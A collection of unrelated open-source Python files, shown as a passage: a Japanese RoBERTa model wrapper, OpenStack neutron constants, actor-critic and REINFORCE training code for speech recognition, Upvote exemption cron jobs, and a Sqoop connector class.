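# Usage sketch: a hypothetical round trip through the helpers above; the
# output path and row values are made up for illustration.
if __name__ == "__main__":
    import sys
    outFile = "tmp/fileOpsDemo/rows.tab"
    ensureFileDir(outFile)
    fh = open(outFile, "w")
    prRowv(fh, "chrom", "start", "end")
    prRow(fh, ["chr1", 100, 200])
    fh.close()
    prLine(sys.stderr, "wrote ", outFile)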
|
pororo/models/brainbert/JaBERTa.py | jayten42/pororo | 1,137 | 12750906 | <gh_stars>1000+
# Copyright (c) Facebook, Inc., its affiliates and Kakao Brain. All Rights Reserved
from typing import Dict, Union
import torch
from fairseq.models.roberta import RobertaModel
from fairseq.models.roberta.hub_interface import RobertaHubInterface
from transformers import BertJapaneseTokenizer
from pororo.models.brainbert.utils import softmax
from pororo.tasks.utils.download_utils import download_or_load
class JabertaModel(RobertaModel):
@classmethod
def load_model(cls, model_name: str, lang: str, **kwargs):
"""
Load pre-trained model as RobertaHubInterface.
:param model_name: model name from available_models
:return: pre-trained model
"""
from fairseq import hub_utils
ckpt_dir = download_or_load(model_name, lang)
x = hub_utils.from_pretrained(
ckpt_dir,
"model.pt",
load_checkpoint_heads=True,
**kwargs,
)
return JabertaHubInterface(x["args"], x["task"], x["models"][0])
class JabertaHubInterface(RobertaHubInterface):
def __init__(self, args, task, model):
super().__init__(args, task, model)
try:
import ipadic # noqa
except ImportError:
raise ImportError(
"Please install ipadic with: `pip install ipadic`")
try:
import fugashi # noqa
except ImportError:
raise ImportError(
"Please install fugashi with: `pip install fugashi`")
self.bpe = BertJapaneseTokenizer.from_pretrained(
"cl-tohoku/bert-base-japanese-whole-word-masking")
def tokenize(self, sentence: str, add_special_tokens: bool = False):
result = " ".join(self.bpe.tokenize(sentence)[:510])
if add_special_tokens:
result = f"<s> {result} </s>"
return result
def encode(
self,
sentence: str,
*addl_sentences,
add_special_tokens: bool = True,
no_separator: bool = False,
return_bpe: bool = False,
) -> torch.LongTensor:
bpe_sentence = self.tokenize(
sentence,
add_special_tokens=add_special_tokens,
)
for s in addl_sentences:
bpe_sentence += " </s>" if not no_separator and add_special_tokens else ""
bpe_sentence += (" " + self.tokenize(s, add_special_tokens=False) +
" </s>" if add_special_tokens else "")
tokens = self.task.source_dictionary.encode_line(
bpe_sentence,
append_eos=False,
add_if_not_exist=False,
)
if return_bpe:
return tokens.long(), bpe_sentence.split()[1:-1]
return tokens.long()
def fill_mask(self, masked_input: str, topk: int = 5):
masked_token = "__"
assert (
masked_token in masked_input and
masked_input.count(masked_token) == 1
), "Please add one {0} token for the input, eg: 'He is a {0} guy'".format(
masked_token)
text_spans = masked_input.split(masked_token)
text_spans_bpe = ((" {0} ".format("<mask>")).join([
" ".join(self.bpe.tokenize(text_span.rstrip()))
for text_span in text_spans
]).strip())
tokens = self.task.source_dictionary.encode_line(
"<s> " + text_spans_bpe + " </s>",
append_eos=False,
add_if_not_exist=False,
)
masked_index = torch.nonzero(
tokens == self.task.mask_idx,
as_tuple=False,
)
if tokens.dim() == 1:
tokens = tokens.unsqueeze(0)
with torch.no_grad():
features, _ = self.model(
tokens.long().to(device=self.device),
features_only=False,
return_all_hiddens=False,
)
logits = features[0, masked_index, :].squeeze()
prob = logits.softmax(dim=0)
_, index = prob.topk(k=topk, dim=0)
topk_predicted_token_bpe = self.task.source_dictionary.string(index)
return [
bpe.replace("##", "") for bpe in topk_predicted_token_bpe.split()
]
@torch.no_grad()
def predict_output(
self,
sentence: str,
*addl_sentences,
add_special_tokens: bool = True,
no_separator: bool = False,
show_probs: bool = False,
) -> Union[str, Dict]:
assert (
"sentence_classification_head" in self.model.classification_heads
), "need pre-trained sentence_classification_head to make predictions"
tokens = self.encode(
sentence,
*addl_sentences,
add_special_tokens=add_special_tokens,
no_separator=no_separator,
)
with torch.no_grad():
prediction = self.predict(
"sentence_classification_head",
tokens,
return_logits=self.args.regression_target,
)
if self.args.regression_target:
return prediction.item() # float
label_fn = lambda label: self.task.label_dictionary.string(
[label + self.task.label_dictionary.nspecial])
if show_probs:
probs = softmax(prediction.cpu().numpy())
probs = probs.tolist()
probs = {label_fn(i): prob for i, prob in enumerate(probs)}
return probs
return label_fn(prediction.argmax().item()) # str
@torch.no_grad()
def predict_tags(self, sentence: str, no_separator: bool = False):
label_fn = lambda label: self.task.label_dictionary.string([label])
tokens, words = self.encode(
sentence,
no_separator=no_separator,
return_bpe=True,
)
# Get first batch and ignore <s> & </s> tokens
preds = (self.predict(
"sequence_tagging_head",
tokens,
)[0, 1:-1, :].argmax(dim=1).cpu().numpy())
labels = [
label_fn(int(pred) + self.task.label_dictionary.nspecial)
for pred in preds
]
return [(word, label) for word, label in zip(words, labels)]
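# Usage sketch: a hypothetical call pattern for the interface above. The
# checkpoint name below is a placeholder -- the real identifier has to come
# from Pororo's available_models registry -- so this is not runnable as-is.
if __name__ == "__main__":
    model = JabertaModel.load_model("<jaberta-checkpoint>", lang="ja")
    # fill_mask expects exactly one "__" placeholder in the input sentence.
    print(model.fill_mask("日本の首都は__です。", topk=5))
    # predict_output requires a fine-tuned sentence_classification_head.
    print(model.predict_output("これはテストです。", show_probs=True))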
|
neutron/plugins/common/constants.py | congnt95/neutron | 1,080 | 12750912 | # Copyright 2012 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.plugins import constants as p_const
# Maps extension alias to service type that
# can be implemented by the core plugin.
EXT_TO_SERVICE_MAPPING = {
'fwaas': p_const.FIREWALL,
'vpnaas': p_const.VPN,
'metering': p_const.METERING,
'router': p_const.L3,
'qos': p_const.QOS,
}
# Maps default service plugins entry points to their extension aliases
DEFAULT_SERVICE_PLUGINS = {
'auto_allocate': 'auto-allocated-topology',
'tag': 'tag',
'timestamp': 'timestamp',
'network_ip_availability': 'network-ip-availability',
'flavors': 'flavors',
'revisions': 'revisions',
}
|
lvsr/bricks/readouts.py | Fatman003/Actor | 178 | 12750913 | import logging
import theano
from theano.gradient import disconnected_grad
from theano import tensor
from blocks.graph import ComputationGraph
from blocks.filter import VariableFilter
from blocks.bricks import Linear, NDimensionalSoftmax
from blocks.bricks.base import application
from blocks.roles import OUTPUT, add_role, WEIGHT
from blocks.utils import dict_subset, shared_floatx_nans
from blocks_extras.bricks.sequence_generator2 import SoftmaxReadout, MergeReadout
logger = logging.getLogger(__name__)
class ReinforceReadout(SoftmaxReadout):
def __init__(self, reward_brick, entropy=None, **kwargs):
super(ReinforceReadout, self).__init__(**kwargs)
self.reward_brick = reward_brick
self.entropy_coof = entropy
self.value_prediction = Linear(output_dim=1, name='value_prediction')
self.children += [
reward_brick, self.value_prediction]
self.costs.inputs += ['attended', 'attended_mask']
def _push_allocation_config(self):
super(ReinforceReadout, self)._push_allocation_config()
self.value_prediction.input_dim = self.get_dim('states')
@application
def costs(self, application_call, prediction, prediction_mask,
groundtruth, groundtruth_mask,
**inputs):
states = disconnected_grad(inputs['states'])
merged = self.merge(**dict_subset(inputs, self.merge_names))
# Compute log-probabilities for the predicted tokens
log_probs = -self.all_scores(prediction, merged) * prediction_mask
# Compute per-token rewards
rewards = self.reward_brick.apply(prediction, prediction_mask,
groundtruth, groundtruth_mask).sum(axis=-1)
# Encourage entropy by adding negated log-probs to the rewards
application_call.add_auxiliary_variable(log_probs, name='log_probs')
if self.entropy_coof:
rewards += self.entropy_coof * disconnected_grad(-log_probs)
future_rewards = rewards[::-1].cumsum(axis=0)[::-1]
baselines = self.value_prediction.apply(states)[:, :, 0]
application_call.add_auxiliary_variable(
baselines, name='baselines')
# Compute baseline error
centered_future_rewards = future_rewards - baselines
baseline_errors = (
(centered_future_rewards *
disconnected_grad(prediction_mask)) ** 2).sum(axis=0)
application_call.add_auxiliary_variable(
baseline_errors, name='baseline_errors')
# The gradient of this will be the REINFORCE 1-sample
# gradient estimate
costs = (disconnected_grad(centered_future_rewards)
* log_probs
* prediction_mask).sum(axis=0)
# Add auxiliary variables for intermediate steps of the computation
application_call.add_auxiliary_variable(
rewards, name='rewards')
application_call.add_auxiliary_variable(
log_probs.copy(), name='prediction_log_probs')
return costs
class CriticReadout(MergeReadout):
def __init__(self, num_tokens,
value_softmax=False, same_value_for_wrong=False,
groundtruth_word_bonus=False, dueling_outputs=False, **kwargs):
self.value_softmax = value_softmax
self.same_value_for_wrong = same_value_for_wrong
self.groundtruth_word_bonus = groundtruth_word_bonus
self.dueling_outputs = dueling_outputs
super(CriticReadout, self).__init__(post_merge_dim=num_tokens, **kwargs)
self.costs.inputs = ([
'prediction', 'prediction_mask',
'groundtruth', 'groundtruth_mask']
+ self.input_names)
def _allocate(self):
w = shared_floatx_nans((self.get_dim('states'),), name='add_weights')
add_role(w, WEIGHT)
self.parameters.append(w)
def _initialize(self):
self.weights_init.initialize(self.parameters[0], self.rng)
# For compatibility with Blocks-extras
def sample(self):
raise NotImplementedError()
# For compatibility with Blocks-extras
def scores(self):
pass
@application
def costs(self, prediction, prediction_mask,
groundtruth, groundtruth_mask, **inputs):
outputs = self.all_outputs(groundtruth, groundtruth_mask, **inputs)
# It does not matter what we return here, as long as it contains
# the values in the computation graph.
return outputs.sum()
@application
def all_outputs(self, application_call, groundtruth, groundtruth_mask, **inputs):
outputs = self.merge(**dict_subset(inputs, self.merge_names))
indices = tensor.repeat(
tensor.arange(groundtruth.shape[1]), groundtruth.shape[0])
if self.value_softmax:
logger.debug('Applying value softmax')
outputs = (tensor.addbroadcast(outputs[:, :, :1], 2)
+ self.softmax.apply(outputs[:, :, 1:], extra_ndim=1))
if self.same_value_for_wrong:
            logger.debug('Same value for a priori wrong actions')
wrong_output = outputs[:, :, 0]
outputs = outputs[:, :, 1:]
wrong_mask = tensor.ones_like(outputs[0])
wrong_mask = tensor.set_subtensor(
wrong_mask[indices, groundtruth.T.flatten()], 0)
outputs = (outputs * (1 - wrong_mask)
+ wrong_output[:, :, None] * wrong_mask)
application_call.add_auxiliary_variable(wrong_mask, name='wrong_mask')
if self.groundtruth_word_bonus:
            logger.debug('Bonus for groundtruth words')
wrong_mask = tensor.ones_like(outputs[0])
wrong_mask = tensor.set_subtensor(
wrong_mask[indices, groundtruth.T.flatten()], 0)
w, = self.parameters
bonuses = inputs['states'].dot(w)
outputs += bonuses[:, :, None] * (1 - wrong_mask)[None, :, :]
if self.dueling_outputs:
logger.debug('Dueling outputs a-la dueling networks')
base_output = outputs[:, :, [0]]
dueling_outputs = outputs[:, :, 1:]
outputs = base_output + dueling_outputs - dueling_outputs.mean(axis=2, keepdims=True)
return outputs
@application
def outputs(self, groundtruth, groundtruth_mask, **inputs):
# Copy-pasted from all_outputs, because Theano does not support ellipsis
outputs = self.merge(**dict_subset(inputs, self.merge_names))
indices = tensor.repeat(
tensor.arange(groundtruth.shape[1]), groundtruth.shape[0])
if self.value_softmax:
logger.debug('Applying value softmax')
outputs = (tensor.addbroadcast(outputs[:, :1], 1)
+ self.softmax.apply(outputs[:, 1:]))
if self.same_value_for_wrong:
            logger.debug('Same value for a priori wrong actions')
wrong_output = outputs[:, 0]
outputs = outputs[:, 1:]
wrong_mask = tensor.ones_like(outputs)
wrong_mask = tensor.set_subtensor(
wrong_mask[indices, groundtruth.T.flatten()], 0)
outputs = (outputs * (1 - wrong_mask)
+ wrong_output[:, None] * wrong_mask)
if self.groundtruth_word_bonus:
            logger.debug('Bonus for groundtruth words')
wrong_mask = tensor.ones_like(outputs)
wrong_mask = tensor.set_subtensor(
wrong_mask[indices, groundtruth.T.flatten()], 0)
w, = self.parameters
bonuses = inputs['states'].dot(w)
outputs = outputs + bonuses[:, None] * (1 - wrong_mask)
if self.dueling_outputs:
logger.debug('Dueling outputs a-la dueling networks')
base_output = outputs[:, [0]]
dueling_outputs = outputs[:, 1:]
outputs = base_output + dueling_outputs - dueling_outputs.mean(axis=1, keepdims=True)
return outputs
class ActorCriticReadout(SoftmaxReadout):
"""Actor-critic
    Parameters
    ----------
bos_token : int
The token used to pad critic input. Critic needs to do
at least one extra step compared to the actor in order
to get the first glimpse of the ground-truth sequence
before predicting the actual values.
"""
def __init__(self, reward_brick,
compute_targets, solve_bellman,
freeze_actor, freeze_critic, critic_uses_actor_states,
critic_uses_groundtruth,
critic=None, critic_burnin_steps=None,
critic_loss=None,
critic_policy_t=None,
entropy_reward_coof=None, cross_entropy_reward_coof=None,
trpo_coef=None,
discount=None,
value_penalty=None, value_penalty_type=None,
accumulate_outputs=False, use_value_biases=None,
actor_grad_estimate=None,
bos_token=None,
**kwargs):
super(ActorCriticReadout, self).__init__(**kwargs)
self.reward_brick = reward_brick
self.critic = critic
self.freeze_actor = freeze_actor
self.freeze_critic = freeze_critic
self.critic_uses_actor_states = critic_uses_actor_states
self.critic_uses_groundtruth = (
critic_uses_groundtruth if critic_uses_groundtruth is not None else True)
self.critic_burnin_steps = (
critic_burnin_steps if critic_burnin_steps is not None else 0)
self.critic_loss = (
critic_loss if critic_loss is not None else "L2")
self.value_summand = Linear(output_dim=1, name='summand')
self.softmax_t = 1.
self.critic_policy_t = (
critic_policy_t if critic_policy_t is not None else 1.0)
self.epsilon = 0.
self.discount = (
discount if discount is not None else 1.)
self.entropy_reward_coof = (
entropy_reward_coof if entropy_reward_coof is not None else 0.)
self.cross_entropy_reward_coof = (
cross_entropy_reward_coof if cross_entropy_reward_coof is not None else 0.)
self.trpo_coef = (
trpo_coef if trpo_coef is not None else 0.)
self.value_penalty = value_penalty
self.value_penalty_type = (
value_penalty_type if value_penalty_type is not None else "L2")
self.compute_targets = compute_targets
self.solve_bellman = solve_bellman
self.accumulate_outputs = accumulate_outputs
self.use_value_biases = (
use_value_biases if use_value_biases is not None else True)
self.actor_grad_estimate = (
actor_grad_estimate if actor_grad_estimate else 'all_actions')
self.bos_token = bos_token
self.softmax = NDimensionalSoftmax()
self.children += [reward_brick, self.value_summand, self.softmax]
if self.critic:
self.children.append(self.critic)
self.costs.inputs += ['attended', 'attended_mask']
def _push_allocation_config(self):
super(ActorCriticReadout, self)._push_allocation_config()
self.value_summand.input_dim = self.get_dim('attended')
@application
def scores(self, **inputs):
merged = self.merge(**dict_subset(inputs, self.merge_names))
return self.softmax.log_probabilities(
merged * self.softmax_t, extra_ndim=merged.ndim - 2)
@application
def costs(self, application_call, prediction, prediction_mask,
groundtruth, groundtruth_mask,
**inputs):
def _prediction_subtensor(data):
if data.ndim != 3:
raise ValueError
flat_data = data.reshape((
data.shape[0] * data.shape[1],
data.shape[2]))
flat_data = flat_data[
tensor.arange(flat_data.shape[0]), prediction.flatten()]
return flat_data.reshape((
prediction.shape[0], prediction.shape[1]))
attended = disconnected_grad(inputs.pop('attended'))
attended_mask = disconnected_grad(inputs.pop('attended_mask'))
# Compute the rewards
rewards = self.reward_brick.apply(
prediction, prediction_mask,
groundtruth, groundtruth_mask)[:, :, 0]
future_rewards = rewards[::-1].cumsum(axis=0)[::-1]
# Compute the critic outputs
if self.critic:
padding = tensor.repeat(
tensor.fill(prediction[0:1], self.bos_token), 1, axis=0)
mask_padding = tensor.repeat(
tensor.fill(prediction_mask[0:1], 1.), 1, axis=0)
padded_prediction = tensor.concatenate([padding, prediction])
padded_prediction_mask = tensor.concatenate([mask_padding, prediction_mask])
if self.critic_uses_groundtruth:
critic_context = groundtruth
critic_context_mask = groundtruth_mask
else:
critic_context = tensor.zeros_like(groundtruth[0:1])
critic_context_mask = tensor.zeros_like(groundtruth_mask[0:1])
critic_kwargs = dict(
prediction=padded_prediction, prediction_mask=padded_prediction_mask,
groundtruth=critic_context, groundtruth_mask=critic_context_mask,
inputs=critic_context, inputs_mask=critic_context_mask)
if self.critic_uses_actor_states:
extra_inputs = disconnected_grad(inputs['states'])
# We don't need the very last hidden state of the actor
# in extra_inputs. We have to add something instead for the shapes
                # to match. It doesn't matter what exactly we add.
critic_kwargs['extra_inputs'] = tensor.concatenate(
[extra_inputs, tensor.zeros_like(extra_inputs[0:1])])
critic_cg = ComputationGraph(self.critic.costs(**critic_kwargs))
outputs, = VariableFilter(
applications=[self.critic.generator.readout.all_outputs],
roles=[OUTPUT])(critic_cg)
# The first subtensor should be discarded, because it was outputted
# for the padding. In addition to that Q-values from the first
# 'critic_burnin_steps' will be ignored, see later in the code.
outputs = outputs[1:]
else:
outputs = self.merge(**dict_subset(inputs, self.merge_names))
prediction_outputs = _prediction_subtensor(outputs)
# Compute Q adjustments
adjustments = outputs
prediction_adjustments = prediction_outputs
if self.accumulate_outputs:
prediction_adjustments = prediction_outputs.cumsum(axis=0)
adjustments = tensor.inc_subtensor(
adjustments[1:], prediction_adjustments[:-1][:, :, None])
# Compute shared additive biases for all Q values
if self.use_value_biases:
value_biases = (
self.value_summand.apply(attended)[:, :, 0]
* attended_mask).sum(axis=0)
else:
value_biases = tensor.zeros_like(adjustments[0, :, 0])
values = adjustments + value_biases[None, :, None]
prediction_values = prediction_adjustments + value_biases[None, :]
rolled_prediction_mask = tensor.roll(prediction_mask, -1, axis=0)
rolled_prediction_mask = tensor.set_subtensor(
rolled_prediction_mask[-1], 0)
# Compute probabilities
logs = self.scores(use_epsilon=False, **inputs)
probs = tensor.exp(logs)
if self.trpo_coef:
logger.debug("Using TRPO coefficient of {}".format(self.trpo_coef))
old_probs = tensor.tensor3('probs')
else:
old_probs = tensor.zeros_like(probs)
prediction_logs = _prediction_subtensor(logs)
# Compute value targets
value_targets = (disconnected_grad(probs) * values).sum(axis=-1)
value_targets = tensor.roll(value_targets, -1, axis=0)
value_targets = (self.discount * value_targets * rolled_prediction_mask
+ rewards)
value_targets = value_targets.astype(theano.config.floatX)
total_costs = 0
# Compute critic cost
if not self.compute_targets:
logger.debug("Using given targets")
value_targets = tensor.matrix('value_targets')
if self.solve_bellman == 'no':
logger.debug("Not solving Bellman, just predicting the rewards")
value_targets = rewards.copy(name='value_targets')
elif self.solve_bellman == 'without_dp':
future_rewards = rewards[::-1].cumsum(axis=0)[::-1]
logger.debug("Solving Bellman, but without DP")
value_targets = future_rewards
elif self.solve_bellman is not True:
raise ValueError()
critic_errors = prediction_values - value_targets
if self.critic_loss == 'L2':
logger.debug("L2 loss for the critic")
critic_costs_per_char = critic_errors ** 2 * prediction_mask
elif self.critic_loss == 'huber':
logger.debug("Huber loss for the critic")
use_L2 = tensor.lt(abs(critic_errors), 0.5)
critic_costs_per_char = (use_L2 * critic_errors ** 2 +
(1 - use_L2) * abs(critic_errors)) * prediction_mask
else:
raise ValueError()
critic_costs = critic_costs_per_char[self.critic_burnin_steps:].sum(axis=0)
if not self.freeze_critic:
total_costs += critic_costs
# Compute critic Monte-Carlo cost
critic_monte_carlo_costs = (
(((prediction_values - future_rewards) ** 2) * prediction_mask)
[self.critic_burnin_steps:].sum(axis=0))
# Value penalty
if self.value_penalty:
logger.debug("Use value penalty")
if self.value_penalty_type == 'L2':
value_deviations = (values - values.mean(axis=-1, keepdims=True)) ** 2
elif self.value_penalty_type == 'L1':
value_deviations = abs(values - values.mean(axis=-1, keepdims=True))
else:
raise ValueError("unknown value penalty type {}".format(self.value_penalty_type))
if not self.freeze_critic:
total_costs += (
self.value_penalty *
(value_deviations.sum(axis=-1) * prediction_mask)
[self.critic_burnin_steps:].sum(axis=0))
# Compute actor cost
if self.critic:
# The actor cost will be minimized, that's why values
# must be negated.
est_name = self.actor_grad_estimate
if est_name == 'all_actions':
disadvantages = disconnected_grad(
values.max(axis=-1)[:, :, None] - values)
actor_costs = ((probs * disadvantages).sum(axis=-1)
* prediction_mask)
actor_costs = actor_costs[self.critic_burnin_steps:]
elif est_name.startswith('1_action'):
                # Here we do not provide a target for the first step because
                # we lack an estimate of the value of the initial state; this
                # is how our critic works. Hopefully the network won't unlearn
                # to produce a BOS first.
future_reward_estimate = (future_rewards
if est_name.endswith('unbiased')
else prediction_values)
weights = -disconnected_grad(
future_reward_estimate[1:] + rewards[:-1] - prediction_values[:-1])
actor_costs = ((prediction_logs[1:] * weights) * prediction_mask[1:])
actor_costs = actor_costs[self.critic_burnin_steps + 1:]
else:
raise ValueError
actor_costs = actor_costs.sum(axis=0)
actor_entropies = (probs * -logs).sum(axis=-1) * prediction_mask
actor_entropies = actor_entropies[self.critic_burnin_steps:].sum(axis=0)
old_actor_cross_entropies = (old_probs * -logs).sum(axis=-1) * prediction_mask
old_actor_cross_entropies = old_actor_cross_entropies[self.critic_burnin_steps:].sum(axis=0)
critic_policy = disconnected_grad(
self.softmax.apply(self.critic_policy_t * values, extra_ndim=1))
critic_cross_entropies = (
(critic_policy * -logs).sum(axis=-1)
* prediction_mask)
critic_cross_entropies = critic_cross_entropies[self.critic_burnin_steps:].sum(axis=0)
actor_costs_with_penalties = (
actor_costs
- self.entropy_reward_coof * actor_entropies
# But really, should it be minus here, below?
- self.cross_entropy_reward_coof * critic_cross_entropies
+ self.trpo_coef * old_actor_cross_entropies)
if not self.freeze_actor:
total_costs += actor_costs_with_penalties
else:
total_costs += disconnected_grad(actor_costs_with_penalties)
# Add auxiliary variables for intermediate steps of the computation
application_call.add_auxiliary_variable(
rewards, name='rewards')
application_call.add_auxiliary_variable(
value_biases, name='value_biases')
application_call.add_auxiliary_variable(
values.copy(), name='values')
application_call.add_auxiliary_variable(
outputs.copy(), name='outputs')
application_call.add_auxiliary_variable(
prediction_values, name='prediction_values')
application_call.add_auxiliary_variable(
prediction_outputs, name='prediction_outputs')
application_call.add_auxiliary_variable(
value_targets.copy(), name='value_targets')
application_call.add_auxiliary_variable(
probs.copy(), name='probs')
application_call.add_auxiliary_variable(
prediction_logs, name='prediction_log_probs')
# Compute some statistics for debugging
last_character_mask = prediction_mask - rolled_prediction_mask
last_character_costs = (critic_costs_per_char * last_character_mask).sum(axis=0)
mean2_output = (
((prediction_outputs ** 2) * prediction_mask).sum()
/ prediction_mask.sum()) ** 0.5
max_output = abs(prediction_outputs * prediction_mask).max()
expected_reward = (probs[0] * values[0]).sum(axis=-1)
application_call.add_auxiliary_variable(
last_character_costs, name='last_character_costs')
application_call.add_auxiliary_variable(
critic_costs.mean(), name='mean_critic_cost')
application_call.add_auxiliary_variable(
critic_monte_carlo_costs.mean(), name='mean_critic_monte_carlo_cost')
if self.critic:
application_call.add_auxiliary_variable(
actor_costs.mean(), name='mean_actor_cost')
application_call.add_auxiliary_variable(
actor_entropies.mean(), name='mean_actor_entropy')
application_call.add_auxiliary_variable(
expected_reward.mean(), name='mean_expected_reward')
application_call.add_auxiliary_variable(
mean2_output, name='mean2_output')
application_call.add_auxiliary_variable(
max_output, name='max_output')
return total_costs
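# Illustration sketch: the REINFORCE-with-baseline estimate that
# ReinforceReadout.costs assembles symbolically, restated with NumPy on plain
# arrays. All tensors follow the (time, batch) layout used above; the inputs
# are assumed to be precomputed log-probabilities of the sampled tokens,
# per-step rewards, baseline predictions and a 0/1 prediction mask.
def _reinforce_cost_sketch(log_probs, rewards, baselines, mask):
    # Rewards accumulated from each step to the end of the sequence.
    future_rewards = rewards[::-1].cumsum(axis=0)[::-1]
    # Treated as a constant w.r.t. the policy parameters, which is what
    # disconnected_grad achieves in the Theano version.
    centered = future_rewards - baselines
    # Differentiating this per-sequence scalar through log_probs gives the
    # 1-sample REINFORCE gradient estimate with a learned baseline.
    return (centered * log_probs * mask).sum(axis=0)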
|
upvote/gae/cron/exemption_upkeep.py | iwikmai/upvote | 453 | 12750962 | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Cron jobs which perform various Exemption maintenance tasks."""
import datetime
import logging
import webapp2
from webapp2_extras import routes
from google.appengine.ext import deferred
from upvote.gae.datastore.models import exemption as exemption_models
from upvote.gae.datastore.models import utils as model_utils
from upvote.gae.lib.exemption import api as exemption_api
from upvote.gae.lib.exemption import notify
from upvote.gae.lib.exemption import monitoring
from upvote.gae.utils import env_utils
from upvote.gae.utils import group_utils
from upvote.gae.utils import handler_utils
from upvote.gae.utils import user_utils
from upvote.shared import constants
# Done for the sake of brevity.
EXEMPTION_STATE = constants.EXEMPTION_STATE
class ProcessExemptions(handler_utils.CronJobHandler):
"""Handler for processing exemptions."""
def get(self):
logging.info('Processing Exemptions...')
exm_query = exemption_models.Exemption.query(
exemption_models.Exemption.state == EXEMPTION_STATE.REQUESTED)
exm_count = 0
for exm in exm_query:
deferred.defer(
exemption_api.Process, exm.key,
_queue=constants.TASK_QUEUE.EXEMPTIONS)
exm_count += 1
monitoring.requested_exemptions.Set(exm_count)
logging.info('Deferred %d Exemption(s) for processing', exm_count)
def _NotifyExpirationsInRange(start_dt, end_dt):
"""Sends an email for all APPROVED Exemptions that expire in the given range.
Args:
start_dt: The starting datetime of the expiration window.
end_dt: The ending datetime of the expiration window.
"""
# Query for the Keys of all Exemptions that expire in the given range.
exm_query = exemption_models.Exemption.query(
exemption_models.Exemption.state == EXEMPTION_STATE.APPROVED,
exemption_models.Exemption.deactivation_dt >= start_dt,
exemption_models.Exemption.deactivation_dt < end_dt)
exm_keys = exm_query.fetch(keys_only=True)
for exm_key in exm_keys:
notify.SendExpirationEmail(exm_key)
class NotifyUpcomingExpirations(handler_utils.CronJobHandler):
"""Handler for notifying users of upcoming exemption expirations."""
def get(self):
now = datetime.datetime.utcnow()
# Notify all users whose Exemptions now have less than a week left, in order
# to give reasonable advance warning (e.g. long weekends, holidays, etc).
one_week_start_dt = now + datetime.timedelta(days=7, hours=-1)
one_week_end_dt = now + datetime.timedelta(days=7)
    # Notify all users whose Exemptions now have less than 24 hours left. This
# will act as a final reminder, and will also ensure that even users who
# choose a 1-day Exemption will get an email warning (for what it's worth).
one_day_start_dt = now + datetime.timedelta(days=1, hours=-1)
one_day_end_dt = now + datetime.timedelta(days=1)
tuples = [
(one_week_start_dt, one_week_end_dt),
(one_day_start_dt, one_day_end_dt)]
# Defer a task for each batch of notifications.
for start_dt, end_dt in tuples:
deferred.defer(
_NotifyExpirationsInRange, start_dt, end_dt,
_queue=constants.TASK_QUEUE.EXEMPTIONS)
class ExpireExemptions(handler_utils.CronJobHandler):
"""Handler for expiring exemptions."""
def get(self):
logging.info('Expiring Exemptions...')
now = datetime.datetime.utcnow()
exm_query = exemption_models.Exemption.query(
exemption_models.Exemption.state == EXEMPTION_STATE.APPROVED,
exemption_models.Exemption.deactivation_dt <= now)
exm_count = 0
for exm in exm_query:
deferred.defer(
exemption_api.Expire, exm.key,
_queue=constants.TASK_QUEUE.EXEMPTIONS)
exm_count += 1
monitoring.expired_exemptions.Set(exm_count)
logging.info('Deferred %d Exemption(s) for expiration', exm_count)
ROUTES = routes.PathPrefixRoute('/exemptions', [
webapp2.Route('/process', handler=ProcessExemptions),
webapp2.Route(
'/notify-upcoming-expirations',
handler=NotifyUpcomingExpirations),
webapp2.Route('/expire', handler=ExpireExemptions),
])
|
apps/sqoop/src/sqoop/client/connector.py | yetsun/hue | 5,079 | 12750980 | <reponame>yetsun/hue<gh_stars>1000+
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from builtins import object
import logging
from desktop.lib.python_util import force_dict_to_strings
from sqoop.client.config import Config
class Connector(object):
def __init__(self, id, name, version, link_config, job_config, config_resources={}, **kwargs):
self.id = id
self.name = name
self.version = version
self.job_config = job_config
self.link_config = link_config
self.config_resources = config_resources
setattr(self, 'class', kwargs['class'])
@staticmethod
def from_dict(connector_dict):
connector_dict.setdefault('link_config', [])
connector_dict['link_config'] = [ Config.from_dict(link_config_dict) for link_config_dict in connector_dict['link-config'] ]
connector_dict.setdefault('job_config', {})
connector_dict['job_config'] = {}
if 'FROM' in connector_dict['job-config']:
connector_dict['job_config']['FROM'] = [ Config.from_dict(from_config_dict) for from_config_dict in connector_dict['job-config']['FROM'] ]
if 'TO' in connector_dict['job-config']:
connector_dict['job_config']['TO'] = [ Config.from_dict(to_config_dict) for to_config_dict in connector_dict['job-config']['TO'] ]
connector_dict['config_resources'] = connector_dict['all-config-resources']
return Connector(**force_dict_to_strings(connector_dict))
def to_dict(self):
d = {
'id': self.id,
'name': self.name,
'version': self.version,
'class': getattr(self, 'class'),
'link-config': [ link_config.to_dict() for link_config in self.link_config ],
'job-config': {},
'all-config-resources': self.config_resources
}
if 'FROM' in self.job_config:
d['job-config']['FROM'] = [ job_config.to_dict() for job_config in self.job_config['FROM'] ]
if 'TO' in self.job_config:
d['job-config']['TO'] = [ job_config.to_dict() for job_config in self.job_config['TO'] ]
return d
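# Usage sketch: building a Connector from the kind of dictionary the Sqoop 2
# REST API returns. The values below are made-up placeholders; only the key
# names ('link-config', 'job-config', 'all-config-resources') mirror what
# from_dict() expects.
if __name__ == "__main__":
    example = {
        'id': 1,
        'name': 'example-connector',
        'version': '1.99',
        'class': 'org.example.ExampleConnector',
        'link-config': [],
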